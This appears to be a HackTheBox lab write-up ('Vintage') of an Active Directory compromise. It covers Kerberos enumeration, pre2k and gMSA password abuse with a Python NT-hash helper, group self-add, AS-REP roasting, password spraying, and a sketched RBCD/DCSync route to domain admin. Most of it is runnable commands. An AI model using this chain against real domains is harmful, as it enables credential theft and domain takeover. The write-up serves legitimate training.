IT Reviews · App Marketplace - qidao123.com Tech Community

Title: HTB Writeup - Vintage

Author: 用多少眼泪才能让你相信    Posted: 2025-4-8 14:40
Information gathering

nmap -sV -sC -O 10.10.11.45

  Nmap scan report for 10.10.11.45
  Host is up (2.1s latency).
  Not shown: 988 filtered tcp ports (no-response)
  PORT     STATE SERVICE       VERSION
  53/tcp   open  domain        Simple DNS Plus
  88/tcp   open  kerberos-sec?
  135/tcp  open  msrpc         Microsoft Windows RPC
  139/tcp  open  netbios-ssn?
  389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: vintage.htb0., Site: Default-First-Site-Name)
  445/tcp  open  microsoft-ds?
  464/tcp  open  kpasswd5?
  593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
  636/tcp  open  tcpwrapped
  3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: vintage.htb0., Site: Default-First-Site-Name)
  3269/tcp open  tcpwrapped
  5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
  |_http-title: Not Found
  |_http-server-header: Microsoft-HTTPAPI/2.0
  1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
  SF-Port139-TCP:V=7.95%I=7%D=4/7%Time=67F39479%P=x86_64-pc-linux-gnu%r(GetR
  SF:equest,5,"\x83\0\0\x01\x8f");
  Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
  No OS matches for host
  Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
  Host script results:
  | smb2-time:
  |   date: 2025-04-07T08:43:58
  |_  start_date: N/A
  |_clock-skew: -19m07s
  | smb2-security-mode:
  |   3:1:1:
  |_    Message signing enabled and required
  OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  Nmap done: 1 IP address (1 host up) scanned in 370.27 seconds
The machine description provides one credential: P.Rosa:Rosaisbest123
GetTGT

impacket-getTGT 'vintage.htb/P.Rosa:Rosaisbest123' -dc-ip 10.10.11.45
Remember to run this under faketime: nmap reported a clock skew of -19m07s, and the KDC rejects any request more than 5 minutes off (KRB_AP_ERR_SKEW). The same faketime wrapper used for bloodhound-python below works here. Then point Kerberos tools at the ticket cache:
export KRB5CCNAME=P.Rosa.ccache
LDAP enumeration

SMB did not get through, so enumerate through LDAP using the Kerberos ticket instead:

nxc ldap 10.10.11.45 -d vintage.htb -k --use-kcache --users
  Administrator
  Guest
  krbtgt
  M.Rossi
  R.Verdi
  L.Bianchi
  G.Viola
  C.Neri
  P.Rosa
  svc_sql
  svc_ldap
  svc_ark
  C.Neri_adm
  L.Bianchi_adm
The LDAP listing is incomplete (no machine accounts), so switch to an SMB RID brute-force, again over Kerberos:
nxc smb 10.10.11.45 -d vintage.htb -u P.Rosa -k --use-kcache --rid-brute | grep "SidTypeUser"
  Administrator
  Guest
  krbtgt
  DC01$
  gMSA01$
  FS01$
  M.Rossi
  R.Verdi
  L.Bianchi
  G.Viola
  C.Neri
  P.Rosa
  svc_sql
  svc_ldap
  svc_ark
  C.Neri_adm
  L.Bianchi_adm
With the usual techniques exhausted and nothing more to collect, go straight to BloodHound and look for a foothold.
BloodHound

faketime "$(ntpdate -q 10.10.11.45 | grep -oP '\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}')" bloodhound-python -d vintage.htb -u P.Rosa -k -no-pass -ns 10.10.11.45 -c all --zip
FS01 is a member of the Pre-Windows 2000 Compatible Access group, so it is worth trying pre2k: a computer account created as a pre-Windows 2000 computer gets a predictable default password (the lowercase account name without the trailing $), and that password keeps working against the KDC until the account is actually joined and rotates it.

pre2k

pre2k unauth -d vintage.htb -dc-ip 10.10.11.45 -save -inputfile user.txt

Following FS01's edges in BloodHound, FS01 is allowed to read GMSA01's password (ReadGMSAPassword), which is exposed through the msDS-ManagedPassword attribute. Export the FS01$ ticket cache that pre2k saved to KRB5CCNAME, then read the attribute; bloodyAD prints the derived NT hash.

GMSA

bloodyAD --host dc01.vintage.htb -d vintage.htb --dc-ip 10.10.11.45 -k get object 'GMSA01$' --attr msDS-ManagedPassword

Get a TGT as gmsa01$ with that NT hash (impacket writes it to gmsa01$.ccache; export that to KRB5CCNAME before the next steps):
impacket-getTGT vintage.htb/'gmsa01$' -hashes :b3a15bbdfb1c53238d4b50ea2c4d1178 -dc-ip 10.10.11.45
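Two steps above end with an NT hash for a machine account: the pre2k guess for FS01$ and the msDS-ManagedPassword read for GMSA01$. The block below is an added example (written for this edit, not code from the write-up or from bloodyAD/pre2k) that shows the arithmetic behind both: the pre-Windows 2000 default-password convention as an assumption (lowercase name without the $, truncated to 14 characters, which is what pre2k tries), and a parser for the MSDS-MANAGEDPASSWORD_BLOB structure from MS-ADTS 2.2.19, whose CurrentPassword bytes are MD4-hashed to give the NT hash tools print. MD4 is implemented inline because OpenSSL 3 hides it behind the legacy provider; the sample blob is constructed locally and contains no real gMSA secret.

```python
"""Added example: pre2k candidate passwords and gMSA msDS-ManagedPassword -> NT hash.
Not part of the original write-up. The pre2k password convention is an assumption;
the sample blob is constructed here, real ones come back from LDAP."""
import struct

MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 in pure Python (hashlib's md4 is often unavailable on OpenSSL 3)."""
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for i in range(16):  # round 1: F = (b & c) | (~b & d)
            a = _rotl((a + ((b & c) | (~b & d)) + x[i]) & MASK, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2: G = majority, column-wise word order
            k = (i % 4) * 4 + i // 4
            a = _rotl((a + ((b & c) | (b & d) | (c & d)) + x[k] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3: H = xor, bit-reversed word order
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a = _rotl((a + (b ^ c ^ d) + x[k] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a0, b0, c0, d0 = (a0 + a) & MASK, (b0 + b) & MASK, (c0 + c) & MASK, (d0 + d) & MASK
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(utf16le_password: bytes) -> str:
    """NT hash = MD4(UTF-16LE password). Takes bytes: gMSA passwords are random
    UTF-16 code units that need not be valid text, so never decode them first."""
    return md4(utf16le_password).hex()


def pre2k_candidate(sam_name: str) -> str:
    """Assumed default password of a pre-Windows 2000 computer account."""
    return sam_name.rstrip("$").lower()[:14]


def _utf16z(blob: bytes, start: int, limit: int) -> bytes:
    """UTF-16LE string from start up to the first 0x0000 code unit, never past limit."""
    end = start
    while end + 2 <= limit and blob[end:end + 2] != b"\x00\x00":
        end += 2
    return blob[start:end]


def parse_managed_password_blob(blob: bytes) -> dict:
    """MSDS-MANAGEDPASSWORD_BLOB: 16-byte header of offsets, then the strings/intervals."""
    version, _res, length, cur_off, prev_off, query_off, unch_off = struct.unpack_from("<HHIHHHH", blob, 0)
    if version != 1 or length > len(blob):
        raise ValueError("not a version-1 managed-password blob, or truncated")
    current = _utf16z(blob, cur_off, prev_off or query_off)
    previous = _utf16z(blob, prev_off, query_off) if prev_off else b""
    query, unchanged = (struct.unpack_from("<Q", blob, o)[0] for o in (query_off, unch_off))
    return {"current_password": current, "previous_password": previous,
            "query_interval_100ns": query, "unchanged_interval_100ns": unchanged}


def managed_password_nt_hash(blob: bytes) -> str:
    """The value bloodyAD ends up printing for --attr msDS-ManagedPassword."""
    return nt_hash(parse_managed_password_blob(blob)["current_password"])


def build_sample_blob(current: bytes, previous: bytes = b"", interval_100ns: int = 24 * 3600 * 10_000_000) -> bytes:
    """Constructed blob in the MS-ADTS layout, for the demo only."""
    body = current + b"\x00\x00"
    prev_off = 0
    if previous:
        prev_off = 16 + len(body)
        body += previous + b"\x00\x00"
    body += b"\x00" * ((-(16 + len(body))) % 8)  # AlignmentPadding before the intervals
    query_off = 16 + len(body)
    body += struct.pack("<Q", interval_100ns)
    unch_off = 16 + len(body)
    body += struct.pack("<Q", interval_100ns)
    return struct.pack("<HHIHHHH", 1, 0, 16 + len(body), 16, prev_off, query_off, unch_off) + body


if __name__ == "__main__":
    for acct in ("DC01$", "gMSA01$", "FS01$"):  # machine accounts from the RID brute-force above
        pw = pre2k_candidate(acct)
        print(f"{acct:<8} pre2k candidate {pw!r:<10} NT {nt_hash(pw.encode('utf-16le'))}")
    demo = build_sample_blob("password".encode("utf-16le"))  # constructed, not a real gMSA secret
    print("sample blob -> NT hash", managed_password_nt_hash(demo))
```

The pre2k hashes can be fed to impacket-getTGT with -hashes just like the gMSA one; the blob parser scans for the 0x0000 terminator instead of trusting a fixed 256-byte length, so it also handles blobs that carry a PreviousPassword after a rotation.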
GMSA01's edges in BloodHound show it can add itself to the SERVICEMANAGERS group, so do that.

AddSelf/GenericWrite

bloodyAD --host "dc01.vintage.htb" -d "vintage.htb" --kerberos --dc-ip 10.10.11.45 -u 'GMSA01$' -k  add groupMember "CN=SERVICEMANAGERS,OU=PRE-MIGRATION,DC=VINTAGE,DC=HTB"  'GMSA01$'
Check that the membership was added:
bloodyAD --host "dc01.vintage.htb" -d "vintage.htb" --kerberos --dc-ip 10.10.11.45 -u 'GMSA01$' -k  get object "CN=SERVICEMANAGERS,OU=PRE-MIGRATION,DC=VINTAGE,DC=HTB" --attr member

Now look at the SERVICEMANAGERS group's edges.

The group has GenericAll over three users, svc_sql among them, so turn off Kerberos pre-authentication on them (UAC flag DONT_REQ_PREAUTH) and AS-REP Roast them. svc_sql is shown here:
bloodyAD --host dc01.vintage.htb -d vintage.htb --dc-ip 10.10.11.45 -k add uac SVC_SQL -f DONT_REQ_PREAUTH
svc_sql is disabled; enable it by removing ACCOUNTDISABLE from its UAC (a disabled account cannot get an AS-REP, so this step is required):
bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.10.11.45 -k remove uac svc_sql -f ACCOUNTDISABLE
AS-REP Roast:
impacket-GetNPUsers vintage/ -request -format hashcat -usersfile user.txt -outputfile np.txt -dc-ip 10.10.11.45 -dc-host dc01.vintage.htb
Crack svc_sql's password:
john np.txt -w=/usr/share/wordlists/rockyou.txt
Password obtained: ???????
Spray that password against the other users (substitute the cracked password as the last argument):
kerbrute passwordspray -d vintage.htb --dc 10.10.11.45 user.txt '<svc_sql password>'
The spray hits C.Neri. WinRM should be able to connect as C.Neri at this point, but I could not get it to connect no matter what I tried, so I will only sketch the rest of the attack path: C.Neri is also a member of SERVICEMANAGERS, so svc_sql can be used for resource-based constrained delegation (RBCD). We want to impersonate a high-privilege user; L.Bianchi_adm has DCSync rights on the domain controller, so RBCD gives us a service ticket impersonating L.Bianchi_adm, and with it we DCSync the DC and obtain the domain administrator's NTLM hash.

Two practitioner notes on that sketch. Since password-based SMB did not get through earlier and every step here went over Kerberos, WinRM most likely needs Kerberos as well: request a TGT for C.Neri with the sprayed password, export it in KRB5CCNAME, and run evil-winrm against dc01.vintage.htb with its -r vintage.htb realm option (the realm must be in /etc/krb5.conf and the hostname must resolve). For the RBCD step, svc_sql needs a servicePrincipalName so it can drive S4U2Self/S4U2Proxy, and the DC's msDS-AllowedToActOnBehalfOfOtherIdentity attribute must be writable by an account we control; the post does not show which right grants that write.

